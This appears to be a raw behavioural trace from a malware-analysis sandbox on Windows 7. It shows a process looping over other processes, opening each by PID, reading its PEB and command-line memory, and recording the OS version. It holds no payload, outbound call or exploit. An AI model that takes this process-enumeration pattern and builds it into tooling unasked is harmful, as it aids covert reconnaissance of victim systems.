[0403.436] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x622940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.436] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6226f2, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.437] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.438] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.438] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.439] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.439] malloc (_Size=0x78) returned 0x2c4740
[0403.439] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x622762, lpBuffer=0x2c4740, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.439] free (_Block=0x2c4740)
[0403.440] CloseHandle (hObject=0x240) returned 1
[0403.441] _ui64tow (_Value=0x9f4, _Buffer="2536", _Radix=10) returned="2548"
[0403.449] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2548") returned 4
[0403.450] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.450] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.480] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x240
[0403.481] GetLastError () returned 0x0
[0403.481] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.481] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.481] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.481] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x462910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.482] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4626e6, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.483] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.484] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.484] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.484] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x461ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.485] malloc (_Size=0x6e) returned 0x2c4740
[0403.485] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x46274c, lpBuffer=0x2c4740, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.485] free (_Block=0x2c4740)
[0403.486] CloseHandle (hObject=0x240) returned 1
[0403.487] _ui64tow (_Value=0xa00, _Buffer="2548", _Radix=10) returned="2560"
[0403.492] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2560") returned 4
[0403.493] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.493] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.517] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa00) returned 0x240
[0403.517] GetLastError () returned 0x0
[0403.517] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.517] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.517] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e2950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.518] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e26fc, lpBuffer=0x12dd100, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.519] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.520] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.520] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.521] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.521] malloc (_Size=0x7c) returned 0x2c4740
[0403.521] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e2770, lpBuffer=0x2c4740, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.521] free (_Block=0x2c4740)
[0403.525] CloseHandle (hObject=0x240) returned 1
[0403.526] _ui64tow (_Value=0xa0c, _Buffer="2560", _Radix=10) returned="2572"
[0403.531] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2572") returned 4
[0403.532] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.532] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.554] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa0c) returned 0x240
[0403.554] GetLastError () returned 0x0
[0403.554] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.554] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.554] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.555] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.555] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b26ea, lpBuffer=0x12dd100, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.556] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.557] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.557] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.558] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.558] malloc (_Size=0x7a) returned 0x2c4740
[0403.558] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1b275c, lpBuffer=0x2c4740, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.558] free (_Block=0x2c4740)
[0403.559] CloseHandle (hObject=0x240) returned 1
[0403.560] _ui64tow (_Value=0xa18, _Buffer="2572", _Radix=10) returned="2584"
[0403.564] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2584") returned 4
[0403.565] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.566] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa18) returned 0x240
[0403.588] GetLastError () returned 0x0
[0403.588] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.588] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.589] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.589] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x462920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.589] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4626e6, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.590] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.591] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.591] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.591] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x461ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.592] malloc (_Size=0x72) returned 0x2c4740
[0403.592] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x462750, lpBuffer=0x2c4740, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.592] free (_Block=0x2c4740)
[0403.593] CloseHandle (hObject=0x240) returned 1
[0403.594] _ui64tow (_Value=0xa24, _Buffer="2584", _Radix=10) returned="2596"
[0403.598] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2596") returned 4
[0403.599] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.599] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.625] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x240
[0403.625] GetLastError () returned 0x0
[0403.625] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.626] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.626] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.626] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c28e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.626] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c26e4, lpBuffer=0x12dd100, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.627] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.629] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.629] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.629] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.629] malloc (_Size=0x60) returned 0x2c0790
[0403.629] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4c273c, lpBuffer=0x2c0790, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0403.629] free (_Block=0x2c0790)
[0403.630] CloseHandle (hObject=0x240) returned 1
[0403.631] _ui64tow (_Value=0xa2c, _Buffer="2596", _Radix=10) returned="2604"
[0403.638] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2604") returned 4
[0403.640] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.640] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.706] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa2c) returned 0x240
[0403.706] GetLastError () returned 0x0
[0403.706] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.706] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.706] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.707] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x202950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.707] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2026f0, lpBuffer=0x12dd100, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.708] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.709] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.709] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.709] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x201ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.710] malloc (_Size=0x82) returned 0x2c4740
[0403.710] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x20276a, lpBuffer=0x2c4740, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.710] free (_Block=0x2c4740)
[0403.711] CloseHandle (hObject=0x240) returned 1
[0403.712] _ui64tow (_Value=0xbb4, _Buffer="2604", _Radix=10) returned="2996"
[0403.716] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2996") returned 4
[0403.718] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.718] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.759] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x240
[0403.759] GetLastError () returned 0x0
[0403.759] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.759] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.760] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.760] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xd2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.760] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xd26f2, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.762] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.763] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.763] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.763] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xd1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.763] malloc (_Size=0x6c) returned 0x2c4740
[0403.764] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xd2756, lpBuffer=0x2c4740, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.764] free (_Block=0x2c4740)
[0403.765] CloseHandle (hObject=0x240) returned 1
[0403.766] _ui64tow (_Value=0xbbc, _Buffer="2996", _Radix=10) returned="3004"
[0403.770] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3004") returned 4
[0403.772] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.772] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.795] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbbc) returned 0x240
[0403.795] GetLastError () returned 0x0
[0403.795] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.796] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.796] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.796] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x572900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.796] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5726ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
